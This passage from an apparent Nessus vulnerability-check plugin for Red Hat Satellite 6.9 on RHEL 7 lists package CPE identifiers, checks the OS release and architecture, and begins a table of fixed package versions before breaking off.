script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-google\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-kubevirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-openstack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-ovirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-vsphere\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman-tasks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman-tasks-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_ansible_core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_azure_rm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_bootdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_discovery\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_hooks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_kubevirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_leapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_openscap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_remote_execution\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_remote_execution-cockpit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_remote_execution_core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_rh_cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_templates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_theme_satellite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_virt_who_configure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-formatador\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-friendly_id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-get_process_mem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-gettext_i18n_rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-gitlab-sidekiq-fetcher\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-globalid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-google-api-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-google-cloud-env\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-googleauth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-graphql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-graphql-batch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-gssapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_azure_rm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_bootdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_discovery\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_kubevirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_leapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_openscap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_remote_execution\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_tasks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_templates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_virt_who_configure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_katello\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hashie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-highline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-http-cookie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-http-form_data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-http_parser.rb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-httpclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-infoblox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ipaddress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-jgrep\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-journald-logger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-journald-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-jwt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-kafo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-kafo_parsers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-kafo_wizards\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-katello\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-kubeclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ldap_fluff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-little-plugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-logging-journald\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-loofah\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-marcel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-memoist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-method_source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mime-types\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mime-types-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mimemagic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mini_mime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mini_portile2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ms_rest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ms_rest_azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-multi_json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-multipart-post\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mustermann\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-ping\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-scp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-ssh-krb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-netrc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-newt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-nio4r\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-nokogiri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-oauth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-openscap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-optimist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-os\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ovirt-engine-sdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ovirt_provision_plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-parse-cron\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-passenger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-passenger-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-passenger-native-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-polyglot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-powerbar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-prometheus-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-promise.rb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-public_suffix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_2to3_migration_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_ansible_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_certguard_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_container_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_deb_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_file_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_rpm_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulpcore_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-puma\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-puma-plugin-systemd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-quantile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rabl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack-cors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack-jsonp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack-protection\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rails-dom-testing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rails-html-sanitizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rails-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-railties\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rainbow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rb-inotify\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rbovirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rbvmomi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-record_tag_helper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-recursive-open-struct\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-redfish_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-redhat_access\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-redhat_access_lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-redis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-representable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-responders\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rest-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-retriable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rkerberos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-roadie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-roadie-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-robotex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rsec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ruby-libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ruby2ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ruby_parser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rubyipmi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-runcible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-safemode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-scoped_search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sd_notify\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-secure_headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sequel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-server_sent_events\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sexp_processor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sidekiq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-signet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sinatra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dhcp_infoblox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dhcp_remote_isc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_discovery\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_discovery_image\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dns_infoblox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dynflow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dynflow_core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_openscap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_pulp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_remote_execution_ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sprockets-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sqlite3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sshkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-statsd-instrument\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-stomp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-text\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-thor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-thread_safe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-tilt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-timeliness\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-tzinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-uber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-unf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-unf_ext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-unicode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-unicode-display_width\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-validates_lengths_from_database\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-webpack-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-websocket-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-websocket-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-will_paginate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-zeitwerk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-runtime\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/server/7/7Server/x86_64/sat-capsule/6.9/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/sat-capsule/6.9/os',\n 'content/dist/rhel/server/7/7Server/x86_64/sat-capsule/6.9/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/satellite/6.9/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/satellite/6.9/os',\n 'content/dist/rhel/server/7/7Server/x86_64/satellite/6.9/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'ansible-collection-redhat-satellite-2.0.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'ansible-runner-1.4.6-1.el7ar', 'release':'7', 'el_string':'el7ar', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'ansiblerole-foreman_scap_client-0.1.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'ansiblerole-insights-client-1.7.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 